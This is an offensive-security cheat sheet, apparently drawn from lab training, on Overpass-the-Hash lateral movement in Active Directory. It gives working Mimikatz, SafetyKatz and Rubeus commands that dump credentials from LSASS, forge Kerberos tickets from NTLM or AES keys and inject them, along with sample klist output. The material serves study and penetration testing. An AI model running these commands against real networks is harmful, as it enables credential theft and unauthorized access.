# Overpass-the-Hash

{% hint style="info" %}

## Pass-the-Hash vs Overpass-the-Hash

* [**Pass-the-Hash (PtH)**](https://x7331.gitbook.io/boxes/tl-dr/active-directory/lateral-movement/pass-the-hash) involves reusing NTLM password hashes—typically the NT hash of a user account—to authenticate over NTLM. This technique works with both local and domain accounts but only against services that accept NTLM (e.g., SMB, WMI, WinRM with NTLM fallback).
* **Overpass-the-Hash (OtH)** leverages the NT or AES keys of a domain user to generate valid Kerberos TGTs, which are then injected into the current session (or a new one). This enables access to Kerberos-authenticated services and is preferred in environments that restrict or monitor NTLM. OtH is effectively a Kerberos-based equivalent of PtH, offering broader access in modern enterprise networks.
{% endhint %}

**Overpass-the-Hash (OtH)** enables Kerberos-based lateral movement by forging a valid TGT from a user's NTLM or AES key, avoiding NTLM authentication entirely. Tools like [Mimikatz](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/mimikatz) generate and inject the TGT into a new process (e.g., `cmd.exe` or PowerShell), allowing access to Kerberos-protected services such as RDP, CIFS, or WinRM. OtH attacks start a new process with Logon Type 9 (`runas /netonly`).

This technique is typically used after compromising a host where the target user has logged in. With administrative access, the attacker extracts the user’s hash from LSASS, generates a Kerberos ticket, and injects it into memory. **OtH is stealthier than PtH**, evades NTLM restrictions, and leverages native system tooling while operating entirely within the Kerberos trust model.

## Tools

{% hint style="info" %}
Although the `mimikatz` module is named `sekurlsa::pth`, this is technically an OtH attack—not traditional PtH; this is just a misnomer.
{% endhint %}

{% tabs %}
{% tab title="mimikatz" %}
Execute an OtH attack with [Mimikatz](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/mimikatz):

{% code overflow="wrap" %}

```powershell
.\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell" "exit"
```

{% endcode %}

There are no cached tickets yet, because no Kerberos-authenticated service has been accessed since the new process was started:

```powershell
> klist
...
Cached Tickets: (0)
```

When a Kerberos-based service is used (e.g. CIFS), a TGT for `krbtgt/CORP.COM` and a TGS for `cifs/files04` are requested and cached:

{% code overflow="wrap" %}

```powershell
> net use \\files04
The command completed successfully.

> klist
...
Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com
```

{% endcode %}

The NTLM hash has been successfully converted into a TGT, which can now be used with any Kerberos-based authentication tool, such as [`PsExec`](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/sysinternals).
{% endtab %}

{% tab title="SafetyKatz" %}
To perform an OtH attack with [SafetyKatz](https://x7331.gitbook.io/boxes/tl-dr/active-directory/lateral-movement/broken-reference):

{% code overflow="wrap" %}

```powershell
# Extract AES256 keys from LSASS
.\SafetyKatz.exe "privilege::debug" "sekurlsa::ekeys" "exit"
```

{% endcode %}

Use the AES256 key (or NT hash) of a domain user to inject a forged TGT and launch a new process (e.g., `cmd.exe`) with Logon Type 9 (`runas /netonly`):

{% hint style="warning" %}
The OtH attack with SafetyKatz needs to be run from an elevated shell!
{% endhint %}

{% code overflow="wrap" %}

```powershell
.\SafetyKatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /aes256:<aes256key> /run:cmd.exe" "exit"
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}
[Rubeus](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/rubeus) can be used for OtH attacks **without access to an elevated shell**. The downside is that it overwrites the current tickets:

```powershell
.\Rubeus.exe asktgt /user:administrator /rc4:<ntlmHash> /ptt
```

If a new process needs to be started (to avoid overwriting the current tickets), access to an elevated shell is required:

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /user:administrator /aes256:<aes256key> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

{% endcode %}
{% endtab %}
{% endtabs %}
